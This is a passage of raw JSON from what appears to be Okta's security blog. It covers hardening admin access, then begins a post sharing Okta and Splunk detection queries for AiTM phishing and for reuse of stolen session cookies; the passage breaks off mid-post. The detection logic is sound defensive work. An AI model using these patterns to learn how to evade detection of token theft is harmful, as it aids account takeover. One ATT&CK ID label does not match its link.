resources.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/automation-hooks/delegated-flows/about-delegated-flows.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Delegated flows\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", meanwhile, provides administrators the ability to run (but not modify) specified Okta Workflows, without requiring SuperAdmin access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Admin Access\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given what an attacker with unauthorized access to highly privileged roles in Okta can do, admin access should be locked down according to the level of risk associated with how that role might be abused.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SuperAdmin roles should ideally make use of Privileged Access Management solutions that securely \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/SuperAdmin-Best-Practices\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"store and rotate ephemeral credentials\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Global Session Policies should enforce shorter session durations and idle timeouts for admins versus regular users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While the permissions and resources available to any given admin role might vary, access to the Okta Admin Console would nearly always meet the NIST criteria for an AAL2+ and AAL3 application. At minimum, the total session for an admin would expire at 12 hours, with an idle timeout of no greater than 15-30 minutes.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1GXHZoMkEUj8FaRjIqSovR\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication Policies for access to the Admin Console should at a minimum require:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing Resistant authenticators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (select “Phishing Resistant” as a possession factor constraint) in a policy that requires any two factor types;\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access from a trusted \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/network/network-zones.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"network zone\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (using an allowlist of trusted IPs/ASNs);\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access from a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/devices-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"registered\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" device (ideally a device exhibiting a strong security posture); and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Re-authentication “at every sign-in”.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"RHqTwD9kVcN1R1coDCLwq\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We also recommend enabling the following features in Okta to prevent abuse of stolen administrative sessions:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ASN and IP Session Binding\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auditing and Monitoring Admin Access\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As employees change roles throughout their employment, it is common that they also amass and retain privileged access to systems and data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Organizations should perform periodic access reviews of admin role assignments and ensure that privileged access is appropriate for each individual. Okta offers an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Reports/admin-role-assignments-report.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"out-of-the-box report\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that provides a snapshot of all admin roles in use.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2OCKXRSstHC8anFd9vjokr\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Outside of these pre-built reports, privileged access to Okta’s administrative functions can be monitored by security teams using Okta System Log. System Log events can be browsed, searched or filtered in the admin console, queried and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/#filtering-results\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"filtered\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" programmatically via the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log API\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and can be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Exporting-Okta-Log-Data?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"exported\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"streamed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to third-party security monitoring tools.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given there are over \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"700+ events\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" emitted by System Log, it might seem exhausting to know where to begin monitoring or auditing this access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are a few ways to narrow it down. Keep in mind that most events in System Log follow a similar pattern:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chris is the Regional CSO, Americas at Okta, where he is responsible for corporate security compliance, third-party risk, and responding to customer security inquiries. Prior to Okta, Chris spent 6 years leading the adoption of Cloud Technologies at LinkedIn, helping them grow from 350 to over 6,800 employees. He started his career designing, developing, and delivering content management, system administration, and messaging solutions for customers such as Nestle, Cisco, AMD, Telus, and the US Department of Defense. He is also an active member of the Northern California ski community, where he volunteers with the Tahoe Backcountry Ski Patrol performing search & rescue, and teaching ski mountaineering & outdoor survival.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/1QgavuS45zIiNfhq3Y0jk0/d33ec80d3294965b5abd63b453e8b4c6/Chris_Niggel_01_20square.jpg"},"name":"Chris Niggel","jobTitle":"Regional CSO, Americas, Okta","slug":"chris-niggel","node_locale":"en"},{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/shareddetections","id":"4d055213-4bf7-5b17-9d7f-a00c46feb9a1","title":"Okta and Splunk Combine to Detect Common Attacks ","date":"2023-04-06T05:50:49+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In an ideal world, every security function would have a Detection Engineering team.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Regrettably, even organizations that are stewards of highly sensitive data often can’t afford (or don’t prioritize) the capabilities required for effective security monitoring. There can be a misconception that cloud service providers are doing the monitoring for them.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It's a challenge that Okta Security wants to help address. Whenever we write a detection for our own purposes (we use Okta, too!), there’s an untapped opportunity to use those detections to help other Okta customers prevent or respond to security incidents that stem from common credential-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So we’ve decided to publish our detection logic. Right here! (Scroll down!)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Publishing raw detection logic will suit many of our customers. But we recognize that publishing them here won’t reach everybody, and it still puts the onus on customers to tune or adapt the detections.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"That’s where mutual friends come in handy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past few months, Okta’s Defensive Cyber Operations team has shared bespoke detection logic with security analytics/SIEM providers, requesting the logic be baked into their content libraries “out of the box.”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The first of those discussions has already borne fruit with Splunk, the security analytics platform chosen most often by Okta customers, thanks to the assistance of James Brodsky, Splunk’s GVP for Security Strategy and Splunk Senior Threat Researcher Michael Haag.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As of Splunk Enterprise Security Content Update (ESCU) v3.62.0, security teams that ingest Okta System Log events into the Splunk platform can run and modify an initial set of bespoke detections in Splunk® Enterprise Security developed by Okta’s Defensive Cyber Operations team. James and Michael have tweaked these raw detections to make them more legible and applicable to a broader number of our mutual customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Splunk update enhances their pre-existing analytic stories for Okta, and includes new approaches to detecting:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session Hijacking via phishing for initial access\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Post-compromise activity by threat actors abusing a stolen session token\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Abuse of Push MFA (including “MFA Fatigue” attacks)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential Stuffing\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Password Spray attacks\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All of these detections are relevant to Okta Identity Engine (not the Classic Engine).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The logic for each is presented below:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Phishing Detection with FastPass Origin Check\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1566/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1556\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta provides a platform detection for when a user enrolled in FastPass fails to authenticate via a real-time AiTM phishing proxy. More info \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpassphishingdetection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"here\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.authentication.auth_via_mfa\\\" AND result eq \\\"FAILURE\\\" AND outcome.reason eq \\\"FastPass declined phishing attempt\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk Analytic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.splunk.com/application/f4ca0057-cbf3-44f8-82ea-4e330ee901d3/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"F4ca0057-cbf3-44f8-82ea-4e330ee901d3\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Use of an Okta Session Cookie\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1539/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1539\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Steal Web Session Cookie\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authors\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scott Dermott and Felicity Robson (Okta)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A detection opportunity arises when an adversary attempts to reuse a stolen web session cookie.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The following analytic looks for one or more policy evaluation events in which multiple client values (IP, User Agent, etc.) change associated to the same Device Token for a specific user. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The query below: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Retrieves policy evaluation events from successful authentication events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Aggregates/Groups by Device Token and User, providing the first policy evaluation event in the search window.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Evaluates whether there is more than one IP and whether there is more than one OS or browser for each combination of User/Device Token.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"index=main sourcetype=OktaIM2:log eventType IN (policy.evaluate_sign_on) outcome.result IN (ALLOW, SUCCESS) | stats earliest(_time) as _time values(client.ipAddress) as src_ip values(client.userAgent.rawUserAgent) as user_agent values(client.userAgent.os) as userAgentOS_list values(client.userAgent.browser) as userAgentBrowser_list values(device.os_platform) as okta_device_os dc(client.userAgent.browser) as dc_userAgentBrowser dc(client.userAgent.os) as dc_userAgentOS dc(client.ipAddress) as dc_src_ip values(outcome.reason) as reason by debugContext.debugData.dtHash actor.alternateId\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" ``` If we see different Operating Systems or Browsers from a UserAccount using with the same DTHash ```\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" | where dc_src_ip>1 AND (dc_userAgentOS>1 OR dc_userAgentBrowser>1)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk Analytic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://research.splunk.com/application/71ad47d1-d6bd-4e0a-b35c-020ad9a6959e/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"71ad47d1-d6bd-4e0a-b35c-020ad9a6959e \",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multiple Failed Requests to Access Okta Applications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1550/004/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1550.004\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1538/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1538\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactic\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Steal Web Session Cookie\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authors\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"John Murphy (Okta)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A detection opportunity arises when an adversary attempts to reuse a stolen web session cookie in an org with well-configured authentication policies. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The following analytic looks for multiple attempts to open app chiclets with no successful response to an authentication challenge.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The query below: 